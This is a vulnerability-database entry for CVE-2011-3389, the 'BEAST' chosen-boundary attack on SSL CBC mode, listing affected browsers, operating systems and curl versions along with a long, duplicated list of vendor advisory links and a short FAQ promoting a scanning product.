CVE-2011-3389
UnknownEPSS 73.33%
Last modified
CVE-2011-3389 is a vulnerability of currently unknown severity. The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.. EPSS estimates a 73.33% chance of exploitation in the next 30 days.
Description
The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.
Metrics
Weakness Enumeration
Affected Software
| Vendor | Product | Versions |
|---|---|---|
| Chrome | All versions | |
| Microsoft | Internet Explorer | All versions |
| Mozilla | Firefox | All versions |
| Opera | Opera Browser | All versions |
| Microsoft | Windows | All versions |
| Siemens | Simatic Rf68xr Firmware | < 3.2.1 |
| Siemens | Simatic Rf615r Firmware | < 3.2.1 |
| Haxx | Curl | >= 7.10.6, <= 7.23.1 |
| Redhat | Enterprise Linux Desktop | 5.0 |
| Redhat | Enterprise Linux Desktop | 6.0 |
| Redhat | Enterprise Linux Eus | 6.2 |
| Redhat | Enterprise Linux Server | 5.0 |
| Redhat | Enterprise Linux Server | 6.0 |
| Redhat | Enterprise Linux Server Aus | 6.2 |
| Redhat | Enterprise Linux Workstation | 5.0 |
| Redhat | Enterprise Linux Workstation | 6.0 |
| Debian | Debian Linux | 5.0 |
| Debian | Debian Linux | 6.0 |
| Canonical | Ubuntu Linux | 10.04 |
| Canonical | Ubuntu Linux | 10.10 |
| Canonical | Ubuntu Linux | 11.04 |
| Canonical | Ubuntu Linux | 11.10 |
References
- http://curl.haxx.se/docs/adv_20120124B.htmlThird Party Advisory
- http://downloads.asterisk.org/pub/security/AST-2016-001.htmlThird Party Advisory
- http://ekoparty.org/2011/juliano-rizzo.phpBroken Link
- http://eprint.iacr.org/2004/111Third Party Advisory
- http://eprint.iacr.org/2006/136Third Party Advisory
- http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.htmlNot Applicable, Vendor Advisory
- http://isc.sans.edu/diary/SSL+TLS+part+3+/11635Third Party Advisory
- http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.htmlBroken Link, Mailing List
- http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.htmlBroken Link, Mailing List
- http://lists.apple.com/archives/security-announce/2012/May/msg00001.htmlBroken Link, Mailing List
- http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.htmlBroken Link, Mailing List
- http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.htmlBroken Link, Mailing List
- http://marc.info/?l=bugtraq&m=132750579901589&w=2Issue Tracking, Mailing List, Third Party Advisory
- http://marc.info/?l=bugtraq&m=132872385320240&w=2Issue Tracking, Mailing List, Third Party Advisory
- http://marc.info/?l=bugtraq&m=133365109612558&w=2Issue Tracking, Mailing List, Third Party Advisory
- http://marc.info/?l=bugtraq&m=133728004526190&w=2Issue Tracking, Mailing List, Third Party Advisory
- http://marc.info/?l=bugtraq&m=134254866602253&w=2Issue Tracking, Mailing List, Third Party Advisory
- http://marc.info/?l=bugtraq&m=134254957702612&w=2Issue Tracking, Mailing List, Third Party Advisory
- http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issueThird Party Advisory
- http://osvdb.org/74829Broken Link
- http://rhn.redhat.com/errata/RHSA-2012-0508.htmlThird Party Advisory
- http://secunia.com/advisories/45791Not Applicable
- http://secunia.com/advisories/47998Not Applicable
- http://secunia.com/advisories/48256Not Applicable
- http://secunia.com/advisories/48692Not Applicable
- http://secunia.com/advisories/48915Not Applicable
- http://secunia.com/advisories/48948Not Applicable
- http://secunia.com/advisories/49198Not Applicable
- http://secunia.com/advisories/55322Not Applicable
- http://secunia.com/advisories/55350Not Applicable
- http://secunia.com/advisories/55351Not Applicable
- http://security.gentoo.org/glsa/glsa-201203-02.xmlThird Party Advisory
- http://security.gentoo.org/glsa/glsa-201406-32.xmlThird Party Advisory
- http://support.apple.com/kb/HT4999Third Party Advisory
- http://support.apple.com/kb/HT5001Third Party Advisory
- http://support.apple.com/kb/HT5130Third Party Advisory
- http://support.apple.com/kb/HT5281Broken Link
- http://support.apple.com/kb/HT5501Third Party Advisory
- http://support.apple.com/kb/HT6150Third Party Advisory
- http://technet.microsoft.com/security/advisory/2588513Patch, Vendor Advisory
- http://vnhacker.blogspot.com/2011/09/beast.htmlThird Party Advisory
- http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdfThird Party Advisory
- http://www.debian.org/security/2012/dsa-2398Third Party Advisory
- http://www.ibm.com/developerworks/java/jdk/alerts/Third Party Advisory
- http://www.imperialviolet.org/2011/09/23/chromeandbeast.htmlThird Party Advisory
- http://www.insecure.cl/Beast-SSL.rarBroken Link, Patch
- http://www.kb.cert.org/vuls/id/864643Third Party Advisory, US Government Resource
- http://www.opera.com/docs/changelogs/mac/1151/Third Party Advisory
- http://www.opera.com/docs/changelogs/mac/1160/Third Party Advisory
- http://www.opera.com/docs/changelogs/unix/1151/Third Party Advisory
- http://www.opera.com/docs/changelogs/unix/1160/Third Party Advisory
- http://www.opera.com/docs/changelogs/windows/1151/Third Party Advisory
- http://www.opera.com/docs/changelogs/windows/1160/Third Party Advisory
- http://www.opera.com/support/kb/view/1004/Third Party Advisory, Vendor Advisory
- http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.htmlThird Party Advisory
- http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.htmlThird Party Advisory
- http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.htmlThird Party Advisory
- http://www.redhat.com/support/errata/RHSA-2011-1384.htmlThird Party Advisory, Vendor Advisory
- http://www.redhat.com/support/errata/RHSA-2012-0006.htmlThird Party Advisory
- http://www.securityfocus.com/bid/49388Third Party Advisory, VDB Entry
- http://www.securityfocus.com/bid/49778Third Party Advisory, VDB Entry
- http://www.securitytracker.com/id/1029190Broken Link, Third Party Advisory, VDB Entry
- http://www.securitytracker.com/id?1025997Broken Link, Third Party Advisory, VDB Entry
- http://www.securitytracker.com/id?1026103Broken Link, Third Party Advisory, VDB Entry
- http://www.securitytracker.com/id?1026704Broken Link, Third Party Advisory, VDB Entry
- http://www.ubuntu.com/usn/USN-1263-1Third Party Advisory
- http://www.us-cert.gov/cas/techalerts/TA12-010A.htmlThird Party Advisory, US Government Resource
- https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmailThird Party Advisory
- https://bugzilla.novell.com/show_bug.cgi?id=719047Issue Tracking, Third Party Advisory
- https://bugzilla.redhat.com/show_bug.cgi?id=737506Issue Tracking, Third Party Advisory
- https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdfThird Party Advisory
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006Patch, Vendor Advisory
- https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02Third Party Advisory, US Government Resource
- http://curl.haxx.se/docs/adv_20120124B.htmlThird Party Advisory
- http://downloads.asterisk.org/pub/security/AST-2016-001.htmlThird Party Advisory
- http://ekoparty.org/2011/juliano-rizzo.phpBroken Link
- http://eprint.iacr.org/2004/111Third Party Advisory
- http://eprint.iacr.org/2006/136Third Party Advisory
- http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.htmlNot Applicable, Vendor Advisory
- http://isc.sans.edu/diary/SSL+TLS+part+3+/11635Third Party Advisory
- http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.htmlBroken Link, Mailing List
- http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.htmlBroken Link, Mailing List
- http://lists.apple.com/archives/security-announce/2012/May/msg00001.htmlBroken Link, Mailing List
- http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.htmlBroken Link, Mailing List
- http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.htmlBroken Link, Mailing List
- http://marc.info/?l=bugtraq&m=132750579901589&w=2Issue Tracking, Mailing List, Third Party Advisory
- http://marc.info/?l=bugtraq&m=132872385320240&w=2Issue Tracking, Mailing List, Third Party Advisory
- http://marc.info/?l=bugtraq&m=133365109612558&w=2Issue Tracking, Mailing List, Third Party Advisory
- http://marc.info/?l=bugtraq&m=133728004526190&w=2Issue Tracking, Mailing List, Third Party Advisory
- http://marc.info/?l=bugtraq&m=134254866602253&w=2Issue Tracking, Mailing List, Third Party Advisory
- http://marc.info/?l=bugtraq&m=134254957702612&w=2Issue Tracking, Mailing List, Third Party Advisory
- http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issueThird Party Advisory
- http://osvdb.org/74829Broken Link
- http://rhn.redhat.com/errata/RHSA-2012-0508.htmlThird Party Advisory
- http://secunia.com/advisories/45791Not Applicable
- http://secunia.com/advisories/47998Not Applicable
- http://secunia.com/advisories/48256Not Applicable
- http://secunia.com/advisories/48692Not Applicable
- http://secunia.com/advisories/48915Not Applicable
- http://secunia.com/advisories/48948Not Applicable
- http://secunia.com/advisories/49198Not Applicable
- http://secunia.com/advisories/55322Not Applicable
- http://secunia.com/advisories/55350Not Applicable
- http://secunia.com/advisories/55351Not Applicable
- http://security.gentoo.org/glsa/glsa-201203-02.xmlThird Party Advisory
- http://security.gentoo.org/glsa/glsa-201406-32.xmlThird Party Advisory
- http://support.apple.com/kb/HT4999Third Party Advisory
- http://support.apple.com/kb/HT5001Third Party Advisory
- http://support.apple.com/kb/HT5130Third Party Advisory
- http://support.apple.com/kb/HT5281Broken Link
- http://support.apple.com/kb/HT5501Third Party Advisory
- http://support.apple.com/kb/HT6150Third Party Advisory
- http://technet.microsoft.com/security/advisory/2588513Patch, Vendor Advisory
- http://vnhacker.blogspot.com/2011/09/beast.htmlThird Party Advisory
- http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdfThird Party Advisory
- http://www.debian.org/security/2012/dsa-2398Third Party Advisory
- http://www.ibm.com/developerworks/java/jdk/alerts/Third Party Advisory
- http://www.imperialviolet.org/2011/09/23/chromeandbeast.htmlThird Party Advisory
- http://www.insecure.cl/Beast-SSL.rarBroken Link, Patch
- http://www.kb.cert.org/vuls/id/864643Third Party Advisory, US Government Resource
- http://www.opera.com/docs/changelogs/mac/1151/Third Party Advisory
- http://www.opera.com/docs/changelogs/mac/1160/Third Party Advisory
- http://www.opera.com/docs/changelogs/unix/1151/Third Party Advisory
- http://www.opera.com/docs/changelogs/unix/1160/Third Party Advisory
- http://www.opera.com/docs/changelogs/windows/1151/Third Party Advisory
- http://www.opera.com/docs/changelogs/windows/1160/Third Party Advisory
- http://www.opera.com/support/kb/view/1004/Third Party Advisory, Vendor Advisory
- http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.htmlThird Party Advisory
- http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.htmlThird Party Advisory
- http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.htmlThird Party Advisory
- http://www.redhat.com/support/errata/RHSA-2011-1384.htmlThird Party Advisory, Vendor Advisory
- http://www.redhat.com/support/errata/RHSA-2012-0006.htmlThird Party Advisory
- http://www.securityfocus.com/bid/49388Third Party Advisory, VDB Entry
- http://www.securityfocus.com/bid/49778Third Party Advisory, VDB Entry
- http://www.securitytracker.com/id/1029190Broken Link, Third Party Advisory, VDB Entry
- http://www.securitytracker.com/id?1025997Broken Link, Third Party Advisory, VDB Entry
- http://www.securitytracker.com/id?1026103Broken Link, Third Party Advisory, VDB Entry
- http://www.securitytracker.com/id?1026704Broken Link, Third Party Advisory, VDB Entry
- http://www.ubuntu.com/usn/USN-1263-1Third Party Advisory
- http://www.us-cert.gov/cas/techalerts/TA12-010A.htmlThird Party Advisory, US Government Resource
- https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmailThird Party Advisory
- https://bugzilla.novell.com/show_bug.cgi?id=719047Issue Tracking, Third Party Advisory
- https://bugzilla.redhat.com/show_bug.cgi?id=737506Issue Tracking, Third Party Advisory
- https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdfThird Party Advisory
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006Patch, Vendor Advisory
- https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02Third Party Advisory, US Government Resource
Timeline
- Published
- Last Modified
- Status
- Modified
Frequently Asked Questions
What is CVE-2011-3389?
The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.
How severe is CVE-2011-3389?
Severity scoring for CVE-2011-3389 is pending analysis. The EPSS model estimates a 73.33% probability of exploitation in the next 30 days.
How do I fix CVE-2011-3389?
Check the vendor references and advisories linked above for patched versions and mitigation guidance. You can also run a Strix scan to test if your systems are affected.
Are you affected by CVE-2011-3389?
Run a free Strix scan to check your systems for this vulnerability.
Scan your code nowSource: NVD / NIST